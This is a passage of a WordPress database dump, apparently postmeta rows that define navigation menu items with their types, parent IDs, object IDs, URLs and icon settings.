}}'),(29205,3259,'_menu_item_icon','null'),(29206,3260,'_menu_item_type','post_type'),(29207,3260,'_menu_item_menu_item_parent','3001'),(29208,3260,'_menu_item_object_id','3054'),(29209,3260,'_menu_item_object','page'),(29210,3260,'_menu_item_target',''),(29211,3260,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29212,3260,'_menu_item_xfn',''),(29213,3260,'_menu_item_url',''),(29214,3260,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29215,3261,'_menu_item_type','post_type'),(29216,3261,'_menu_item_menu_item_parent','3001'),(29217,3261,'_menu_item_object_id','3052'),(29218,3261,'_menu_item_object','page'),(29219,3261,'_menu_item_target',''),(29220,3261,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29221,3261,'_menu_item_xfn',''),(29222,3261,'_menu_item_url',''),(29223,3261,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29224,3262,'_menu_item_type','post_type'),(29225,3262,'_menu_item_menu_item_parent','3001'),(29226,3262,'_menu_item_object_id','3051'),(29227,3262,'_menu_item_object','page'),(29228,3262,'_menu_item_target',''),(29229,3262,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29230,3262,'_menu_item_xfn',''),(29231,3262,'_menu_item_url',''),(29232,3262,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29233,3263,'_menu_item_type','post_type'),(29234,3263,'_menu_item_menu_item_parent','3001'),(29235,3263,'_menu_item_object_id','3049'),(29236,3263,'_menu_item_object','page'),(29237,3263,'_menu_item_target',''),(29238,3263,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29239,3263,'_menu_item_xfn',''),(29240,3263,'_menu_item_url',''),(29241,3263,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29242,3264,'_menu_item_type','post_type'),(29243,3264,'_menu_item_menu_item_parent','3003'),(29244,3264,'_menu_item_object_id','3065'),(29245,3264,'_menu_item_object','page'),(29246,3264,'_menu_item_target',''),(29247,3264,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29248,3264,'_menu_item_xfn',''),(29249,3264,'_menu_item_url',''),(29250,3264,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29251,3265,'_menu_item_type','post_type'),(29252,3265,'_menu_item_menu_item_parent','3003'),(29253,3265,'_menu_item_object_id','3066'),(29254,3265,'_menu_item_object','page'),(29255,3265,'_menu_item_target',''),(29256,3265,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29257,3265,'_menu_item_xfn',''),(29258,3265,'_menu_item_url',''),(29259,3265,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29260,3266,'_menu_item_type','post_type'),(29261,3266,'_menu_item_menu_item_parent','3003'),(29262,3266,'_menu_item_object_id','3067'),(29263,3266,'_menu_item_object','page'),(29264,3266,'_menu_item_target',''),(29265,3266,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29266,3266,'_menu_item_xfn',''),(29267,3266,'_menu_item_url',''),(29268,3266,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29269,3267,'_menu_item_type','post_type'),(29270,3267,'_menu_item_menu_item_parent','3004'),(29271,3267,'_menu_item_object_id','1679'),(29272,3267,'_menu_item_object','page'),(29273,3267,'_menu_item_target',''),(29274,3267,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29275,3267,'_menu_item_xfn',''),(29276,3267,'_menu_item_url',''),(29277,3267,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38372,3747,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38371,3747,'_menu_item_url','#'),(38370,3747,'_menu_item_xfn',''),(38369,3747,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38368,3747,'_menu_item_target',''),(38367,3747,'_menu_item_object','custom'),(52121,4357,'_menu_item_type','custom'),(52117,4356,'_menu_item_xfn',''),(52115,4356,'_menu_item_target',''),(52116,4356,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52114,4356,'_menu_item_object','custom'),(52113,4356,'_menu_item_object_id','4356'),(52112,4356,'_menu_item_menu_item_parent','0'),(52111,4356,'_menu_item_type','custom'),(52109,4355,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52110,4355,'_menu_item_icon','null'),(38366,3747,'_menu_item_object_id','3747'),(38365,3747,'_menu_item_menu_item_parent','3731'),(38364,3747,'_menu_item_type','custom'),(38363,3746,'_menu_item_icon','null'),(52076,4352,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52075,4352,'_menu_item_target',''),(52074,4352,'_menu_item_object','custom'),(52073,4352,'_menu_item_object_id','4352'),(52072,4352,'_menu_item_menu_item_parent','0'),(52071,4352,'_menu_item_type','custom'),(29314,3272,'_menu_item_type','post_type'),(29315,3272,'_menu_item_menu_item_parent','3008'),(29316,3272,'_menu_item_object_id','1679'),(29317,3272,'_menu_item_object','page'),(29318,3272,'_menu_item_target',''),(29319,3272,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29320,3272,'_menu_item_xfn',''),(29321,3272,'_menu_item_url',''),(29322,3272,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29323,3273,'_menu_item_type','post_type'),(29324,3273,'_menu_item_menu_item_parent','3006'),(29325,3273,'_menu_item_object_id','3054'),(29326,3273,'_menu_item_object','page'),(29327,3273,'_menu_item_target',''),(29328,3273,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29329,3273,'_menu_item_xfn',''),(29330,3273,'_menu_item_url',''),(29331,3273,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29332,3274,'_menu_item_type','post_type'),(29333,3274,'_menu_item_menu_item_parent','3006'),(29334,3274,'_menu_item_object_id','3052'),(29335,3274,'_menu_item_object','page'),(29336,3274,'_menu_item_target',''),(29337,3274,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29338,3274,'_menu_item_xfn',''),(29339,3274,'_menu_item_url',''),(29340,3274,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29341,3275,'_menu_item_type','post_type'),(29342,3275,'_menu_item_menu_item_parent','3006'),(29343,3275,'_menu_item_object_id','3049'),(29344,3275,'_menu_item_object','page'),(29345,3275,'_menu_item_target',''),(29346,3275,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29347,3275,'_menu_item_xfn',''),(29348,3275,'_menu_item_url',''),(29349,3275,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29350,3276,'_menu_item_type','post_type'),(29351,3276,'_menu_item_menu_item_parent','3006'),(29352,3276,'_menu_item_object_id','3043'),(29353,3276,'_menu_item_object','page'),(29354,3276,'_menu_item_target',''),(29355,3276,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29356,3276,'_menu_item_xfn',''),(29357,3276,'_menu_item_url',''),(29358,3276,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29359,3277,'_menu_item_type','post_type'),(29360,3277,'_menu_item_menu_item_parent','3023'),(29361,3277,'_menu_item_object_id','1857'),(29362,3277,'_menu_item_object','page'),(29363,3277,'_menu_item_target',''),(29364,3277,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29365,3277,'_menu_item_xfn',''),(29366,3277,'_menu_item_url',''),(29367,3277,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29368,3277,'_menu_item_icon','null'),(29369,3278,'_menu_item_type','post_type'),(29370,3278,'_menu_item_menu_item_parent','3023'),(29371,3278,'_menu_item_object_id','1852'),(29372,3278,'_menu_item_object','page'),(29373,3278,'_menu_item_target',''),(29374,3278,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29375,3278,'_menu_item_xfn',''),(29376,3278,'_menu_item_url',''),(29377,3278,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29378,3278,'_menu_item_icon','null'),(29379,3279,'_menu_item_type','post_type'),(29380,3279,'_menu_item_menu_item_parent','3019'),(29381,3279,'_menu_item_object_id','1857'),(29382,3279,'_menu_item_object','page'),(29383,3279,'_menu_item_target',''),(29384,3279,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29385,3279,'_menu_item_xfn',''),(29386,3279,'_menu_item_url',''),(29387,3279,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29388,3279,'_menu_item_icon','null'),(29389,3280,'_menu_item_type','post_type'),(29390,3280,'_menu_item_menu_item_parent','3019'),(29391,3280,'_menu_item_object_id','1852'),(29392,3280,'_menu_item_object','page'),(29393,3280,'_menu_item_target',''),(29394,3280,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29395,3280,'_menu_item_xfn',''),(29396,3280,'_menu_item_url',''),(29397,3280,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29398,3280,'_menu_item_icon','null'),(29399,3281,'_menu_item_type','post_type'),(29400,3281,'_menu_item_menu_item_parent','3024'),(29401,3281,'_menu_item_object_id','3074'),(29402,3281,'_menu_item_object','page'),(29403,3281,'_menu_item_target',''),(29404,3281,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29405,3281,'_menu_item_xfn',''),(29406,3281,'_menu_item_url',''),(29407,3281,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29408,3281,'_menu_item_icon','null'),(29409,3282,'_menu_item_type','post_type'),(29410,3282,'_menu_item_menu_item_parent','3020'),(29411,3282,'_menu_item_object_id','3074'),(29412,3282,'_menu_item_object','page'),(29413,3282,'_menu_item_target',''),(29414,3282,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29415,3282,'_menu_item_xfn',''),(29416,3282,'_menu_item_url',''),(29417,3282,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29418,3282,'_menu_item_icon','null'),(29419,3283,'_menu_item_type','post_type'),(29420,3283,'_menu_item_menu_item_parent','3018'),(29421,3283,'_menu_item_object_id','1995'),(29422,3283,'_menu_item_object','page'),(29423,3283,'_menu_item_target',''),(29424,3283,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29425,3283,'_menu_item_xfn',''),(29426,3283,'_menu_item_url',''),(29427,3283,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29428,3283,'_menu_item_icon','null'),(29429,3284,'_menu_item_type','post_type'),(29430,3284,'_menu_item_menu_item_parent','3022'),(29431,3284,'_menu_item_object_id','1995'),(29432,3284,'_menu_item_object','page'),(29433,3284,'_menu_item_target',''),(29434,3284,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29435,3284,'_menu_item_xfn',''),(29436,3284,'_menu_item_url',''),(29437,3284,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29438,3284,'_menu_item_icon','null'),(29439,3285,'_menu_item_type','post_type'),(29440,3285,'_menu_item_menu_item_parent','2988'),(29441,3285,'_menu_item_object_id','3054'),(29442,3285,'_menu_item_object','page'),(29443,3285,'_menu_item_target',''),(29444,3285,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29445,3285,'_menu_item_xfn',''),(29446,3285,'_menu_item_url',''),(29447,3285,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29448,3285,'_menu_item_icon','null'),(29449,3286,'_menu_item_type','post_type'),(29450,3286,'_menu_item_menu_item_parent','2988'),(29451,3286,'_menu_item_object_id','3052'),(29452,3286,'_menu_item_object','page'),(29453,3286,'_menu_item_target',''),(29454,3286,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29455,3286,'_menu_item_xfn',''),(29456,3286,'_menu_item_url',''),(29457,3286,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29458,3286,'_menu_item_icon','null'),(29459,3287,'_menu_item_type','post_type'),(29460,3287,'_menu_item_menu_item_parent','2988'),(29461,3287,'_menu_item_object_id','3051'),(29462,3287,'_menu_item_object','page'),(29463,3287,'_menu_item_target',''),(29464,3287,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29465,3287,'_menu_item_xfn',''),(29466,3287,'_menu_item_url',''),(29467,3287,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29468,3287,'_menu_item_icon','null'),(29469,3288,'_menu_item_type','post_type'),(29470,3288,'_menu_item_menu_item_parent','2988'),(29471,3288,'_menu_item_object_id','3049'),(29472,3288,'_menu_item_object','page'),(29473,3288,'_menu_item_target',''),(29474,3288,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29475,3288,'_menu_item_xfn',''),(29476,3288,'_menu_item_url',''),(29477,3288,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29478,3288,'_menu_item_icon','null'),(29479,3289,'_menu_item_type','post_type'),(29480,3289,'_menu_item_menu_item_parent','2988'),(29481,3289,'_menu_item_object_id','3048'),(29482,3289,'_menu_item_object','page'),(29483,3289,'_menu_item_target',''),(29484,3289,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29485,3289,'_menu_item_xfn',''),(29486,3289,'_menu_item_url',''),(29487,3289,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29488,3289,'_menu_item_icon','null'),(29489,3290,'_menu_item_type','post_type'),(29490,3290,'_menu_item_menu_item_parent','2988'),(29491,3290,'_menu_item_object_id','3058'),(29492,3290,'_menu_item_object','page'),(29493,3290,'_menu_item_target',''),(29494,3290,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29495,3290,'_menu_item_xfn',''),(29496,3290,'_menu_item_url',''),(29497,3290,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29498,3290,'_menu_item_icon','null'),(29499,3291,'_menu_item_type','post_type'),(29500,3291,'_menu_item_menu_item_parent','2988'),(29501,3291,'_menu_item_object_id','3059'),(29502,3291,'_menu_item_object','page'),(29503,3291,'_menu_item_target',''),(29504,3291,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29505,3291,'_menu_item_xfn',''),(29506,3291,'_menu_item_url',''),(29507,3291,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29508,3291,'_menu_item_icon','null'),(29509,3292,'_menu_item_type','post_type'),(29510,3292,'_menu_item_menu_item_parent','2988'),(29511,3292,'_menu_item_object_id','3057'),(29512,3292,'_menu_item_object','page'),(29513,3292,'_menu_item_target',''),(29514,3292,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29515,3292,'_menu_item_xfn',''),(29516,3292,'_menu_item_url',''),(29517,3292,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29518,3292,'_menu_item_icon','null'),(29519,3293,'_menu_item_type','post_type'),(29520,3293,'_menu_item_menu_item_parent','2988'),(29521,3293,'_menu_item_object_id','3050'),(29522,3293,'_menu_item_object','page'),(29523,3293,'_menu_item_target',''),(29524,3293,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29525,3293,'_menu_item_xfn',''),(29526,3293,'_menu_item_url',''),(29527,3293,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29528,3293,'_menu_item_icon','null'),(29529,3294,'_menu_item_type','post_type'),(29530,3294,'_menu_item_menu_item_parent','3019'),(29531,3294,'_menu_item_object_id','2019'),(29532,3294,'_menu_item_object','page'),(29533,3294,'_menu_item_target',''),(29534,3294,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29535,3294,'_menu_item_xfn',''),(29536,3294,'_menu_item_url',''),(29537,3294,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29538,3294,'_menu_item_icon','null'),(29539,3295,'_menu_item_type','post_type'),(29540,3295,'_menu_item_menu_item_parent','3023'),(29541,3295,'_menu_item_object_id','2019'),(29542,3295,'_menu_item_object','page'),(29543,3295,'_menu_item_target',''),(29544,3295,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29545,3295,'_menu_item_xfn',''),(29546,3295,'_menu_item_url',''),(29547,3295,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29548,3295,'_menu_item_icon','null'),(29549,3296,'_menu_item_type','post_type'),(29550,3296,'_menu_item_menu_item_parent','3024'),(29551,3296,'_menu_item_object_id','1948'),(29552,3296,'_menu_item_object','page'),(29553,3296,'_menu_item_target',''),(29554,3296,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29555,3296,'_menu_item_xfn',''),(29556,3296,'_menu_item_url',''),(29557,3296,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29558,3296,'_menu_item_icon','null'),(29559,3297,'_menu_item_type','post_type'),(29560,3297,'_menu_item_menu_item_parent','3020'),(29561,3297,'_menu_item_object_id','1948'),(29562,3297,'_menu_item_object','page'),(29563,3297,'_menu_item_target',''),(29564,3297,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29565,3297,'_menu_item_xfn',''),(29566,3297,'_menu_item_url',''),(29567,3297,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29568,3297,'_menu_item_icon','null'),(29569,3298,'_menu_item_type','post_type'),(29570,3298,'_menu_item_menu_item_parent','3017'),(29571,3298,'_menu_item_object_id','2174'),(29572,3298,'_menu_item_object','page'),(29573,3298,'_menu_item_target',''),(29574,3298,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29575,3298,'_menu_item_xfn',''),(29576,3298,'_menu_item_url',''),(29577,3298,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29578,3298,'_menu_item_icon','icon-star'),(29579,3298,'_menu_item_icon_pack','simple_line_icons'),(29580,3299,'_menu_item_type','post_type'),(29581,3299,'_menu_item_menu_item_parent','3021'),(29582,3299,'_menu_item_object_id','2174'),(29583,3299,'_menu_item_object','page'),(29584,3299,'_menu_item_target',''),(29585,3299,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29586,3299,'_menu_item_xfn',''),(29587,3299,'_menu_item_url',''),(29588,3299,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29589,3299,'_menu_item_icon','icon-star'),(29590,3299,'_menu_item_icon_pack','simple_line_icons'),(29591,3300,'_menu_item_type','post_type'),(29592,3300,'_menu_item_menu_item_parent','2998'),(29593,3300,'_menu_item_object_id','1679'),(29594,3300,'_menu_item_object','page'),(29595,3300,'_menu_item_target',''),(29596,3300,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29597,3300,'_menu_item_xfn',''),(29598,3300,'_menu_item_url',''),(29599,3300,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29600,3300,'_menu_item_icon','null'),(38386,3749,'_menu_item_object_id','3749'),(38385,3749,'_menu_item_menu_item_parent','3736'),(38384,3749,'_menu_item_type','custom'),(38383,3748,'_menu_item_icon','null'),(38382,3748,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38381,3748,'_menu_item_url','#'),(38380,3748,'_menu_item_xfn',''),(52138,4358,'_menu_item_url','#'),(52137,4358,'_menu_item_xfn',''),(52135,4358,'_menu_item_target',''),(52136,4358,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52134,4358,'_menu_item_object','custom'),(52133,4358,'_menu_item_object_id','4358'),(52132,4358,'_menu_item_menu_item_parent','0'),(52128,4357,'_menu_item_url','#'),(52129,4357,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52130,4357,'_menu_item_icon','null'),(38154,3725,'_menu_item_object_id','3725'),(38153,3725,'_menu_item_menu_item_parent','0'),(38152,3725,'_menu_item_type','custom'),(38151,3724,'_menu_item_icon','null'),(38148,3724,'_menu_item_xfn',''),(38149,3724,'_menu_item_url','#'),(38150,3724,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38349,3745,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38348,3745,'_menu_item_target',''),(38347,3745,'_menu_item_object','custom'),(38346,3745,'_menu_item_object_id','3745'),(38345,3745,'_menu_item_menu_item_parent','3725'),(38231,3732,'_menu_item_icon','null'),(38230,3732,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38229,3732,'_menu_item_url','#'),(38228,3732,'_menu_item_xfn',''),(38227,3732,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38226,3732,'_menu_item_target',''),(38225,3732,'_menu_item_object','custom'),(52285,4374,'_menu_item_object_id','4374'),(52286,4374,'_menu_item_object','custom'),(52276,4373,'_menu_item_object','custom'),(52277,4373,'_menu_item_target',''),(52278,4373,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52279,4373,'_menu_item_xfn',''),(52271,4372,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29661,3307,'_menu_item_type','post_type'),(29662,3307,'_menu_item_menu_item_parent','3025'),(29663,3307,'_menu_item_object_id','3078'),(29664,3307,'_menu_item_object','portfolio-item'),(29665,3307,'_menu_item_target',''),(29666,3307,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29667,3307,'_menu_item_xfn',''),(29668,3307,'_menu_item_url',''),(29669,3307,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29670,3307,'_menu_item_icon','null'),(29671,3308,'_menu_item_type','post_type'),(29672,3308,'_menu_item_menu_item_parent','3005'),(29673,3308,'_menu_item_object_id','3056'),(29674,3308,'_menu_item_object','page'),(29675,3308,'_menu_item_target',''),(29676,3308,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29677,3308,'_menu_item_xfn',''),(29678,3308,'_menu_item_url',''),(29679,3308,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29680,3309,'_menu_item_type','post_type'),(29681,3309,'_menu_item_menu_item_parent','3028'),(29682,3309,'_menu_item_object_id','3075'),(29683,3309,'_menu_item_object','portfolio-item'),(29684,3309,'_menu_item_target',''),(29685,3309,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29686,3309,'_menu_item_xfn',''),(29687,3309,'_menu_item_url',''),(29688,3309,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29689,3309,'_menu_item_icon','null'),(29690,3310,'_menu_item_type','post_type'),(29691,3310,'_menu_item_menu_item_parent','3028'),(29692,3310,'_menu_item_object_id','3076'),(29693,3310,'_menu_item_object','portfolio-item'),(29694,3310,'_menu_item_target',''),(29695,3310,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29696,3310,'_menu_item_xfn',''),(29697,3310,'_menu_item_url',''),(29698,3310,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29699,3310,'_menu_item_icon','null'),(29700,3311,'_menu_item_type','post_type'),(29701,3311,'_menu_item_menu_item_parent','3028'),(29702,3311,'_menu_item_object_id','3077'),(29703,3311,'_menu_item_object','portfolio-item'),(29704,3311,'_menu_item_target',''),(29705,3311,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29706,3311,'_menu_item_xfn',''),(29707,3311,'_menu_item_url',''),(29708,3311,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29709,3311,'_menu_item_icon','null'),(29710,3312,'_menu_item_type','post_type'),(29711,3312,'_menu_item_menu_item_parent','3028'),(29712,3312,'_menu_item_object_id','3078'),(29713,3312,'_menu_item_object','portfolio-item'),(29714,3312,'_menu_item_target',''),(29715,3312,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29716,3312,'_menu_item_xfn',''),(29717,3312,'_menu_item_url',''),(29718,3312,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29719,3312,'_menu_item_icon','null'),(29720,3313,'_menu_item_type','post_type'),(29721,3313,'_menu_item_menu_item_parent','3028'),(29722,3313,'_menu_item_object_id','3098'),(29723,3313,'_menu_item_object','portfolio-item'),(29724,3313,'_menu_item_target',''),(29725,3313,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29726,3313,'_menu_item_xfn',''),(29727,3313,'_menu_item_url',''),(29728,3313,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29729,3313,'_menu_item_icon','null'),(29730,3314,'_menu_item_type','post_type'),(29731,3314,'_menu_item_menu_item_parent','3023'),(29732,3314,'_menu_item_object_id','2387'),(29733,3314,'_menu_item_object','page'),(29734,3314,'_menu_item_target',''),(29735,3314,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29736,3314,'_menu_item_xfn',''),(29737,3314,'_menu_item_url',''),(29738,3314,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29739,3314,'_menu_item_icon','null'),(29740,3315,'_menu_item_type','post_type'),(29741,3315,'_menu_item_menu_item_parent','3019'),(29742,3315,'_menu_item_object_id','2387'),(29743,3315,'_menu_item_object','page'),(29744,3315,'_menu_item_target',''),(29745,3315,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29746,3315,'_menu_item_xfn',''),(29747,3315,'_menu_item_url',''),(29748,3315,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29749,3315,'_menu_item_icon','null'),(29750,3316,'_menu_item_type','post_type'),(29751,3316,'_menu_item_menu_item_parent','3031'),(29752,3316,'_menu_item_object_id','3075'),(29753,3316,'_menu_item_object','portfolio-item'),(29754,3316,'_menu_item_target',''),(29755,3316,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29756,3316,'_menu_item_xfn',''),(29757,3316,'_menu_item_url',''),(29758,3316,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29759,3317,'_menu_item_type','post_type'),(29760,3317,'_menu_item_menu_item_parent','2998'),(29761,3317,'_menu_item_object_id','2421'),(29762,3317,'_menu_item_object','page'),(29763,3317,'_menu_item_target',''),(29764,3317,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29765,3317,'_menu_item_xfn',''),(29766,3317,'_menu_item_url',''),(29767,3317,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29768,3317,'_menu_item_icon','null'),(29769,3318,'_menu_item_type','post_type'),(29770,3318,'_menu_item_menu_item_parent','2998'),(29771,3318,'_menu_item_object_id','2419'),(29772,3318,'_menu_item_object','page'),(29773,3318,'_menu_item_target',''),(29774,3318,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29775,3318,'_menu_item_xfn',''),(29776,3318,'_menu_item_url',''),(29777,3318,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29778,3318,'_menu_item_icon','null'),(29779,3319,'_menu_item_type','post_type'),(29780,3319,'_menu_item_menu_item_parent','2989'),(29781,3319,'_menu_item_object_id','2421'),(29782,3319,'_menu_item_object','page'),(29783,3319,'_menu_item_target',''),(29784,3319,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29785,3319,'_menu_item_xfn',''),(29786,3319,'_menu_item_url',''),(29787,3319,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29788,3319,'_menu_item_icon','null'),(29789,3320,'_menu_item_type','post_type'),(29790,3320,'_menu_item_menu_item_parent','2989'),(29791,3320,'_menu_item_object_id','2419'),(29792,3320,'_menu_item_object','page'),(29793,3320,'_menu_item_target',''),(29794,3320,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29795,3320,'_menu_item_xfn',''),(29796,3320,'_menu_item_url',''),(29797,3320,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29798,3320,'_menu_item_icon','null'),(29799,3321,'_menu_item_type','post_type'),(29800,3321,'_menu_item_menu_item_parent','2991'),(29801,3321,'_menu_item_object_id','2435'),(29802,3321,'_menu_item_object','page'),(29803,3321,'_menu_item_target',''),(29804,3321,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29805,3321,'_menu_item_xfn',''),(29806,3321,'_menu_item_url',''),(29807,3321,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29808,3321,'_menu_item_icon','null'),(29809,3322,'_menu_item_type','post_type'),(29810,3322,'_menu_item_menu_item_parent','2996'),(29811,3322,'_menu_item_object_id','2435'),(29812,3322,'_menu_item_object','page'),(29813,3322,'_menu_item_target',''),(29814,3322,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29815,3322,'_menu_item_xfn',''),(29816,3322,'_menu_item_url',''),(29817,3322,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29818,3322,'_menu_item_icon','null'),(29819,3323,'_menu_item_type','post_type'),(29820,3323,'_menu_item_menu_item_parent','3031'),(29821,3323,'_menu_item_object_id','2435'),(29822,3323,'_menu_item_object','page'),(29823,3323,'_menu_item_target',''),(29824,3323,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(29825,3323,'_menu_item_xfn',''),(29826,3323,'_menu_item_url',''),(29827,3323,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(29828,3324,'_menu_item_type','post_type'),(29829,3324,'_menu_item_menu_item_parent','3030'),(29830,3324,'_menu_item_object_id','1811'),(29831,3324,'_menu_item_object','page'),(29832,3324,'_menu_item_target',''),(29833,3324,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(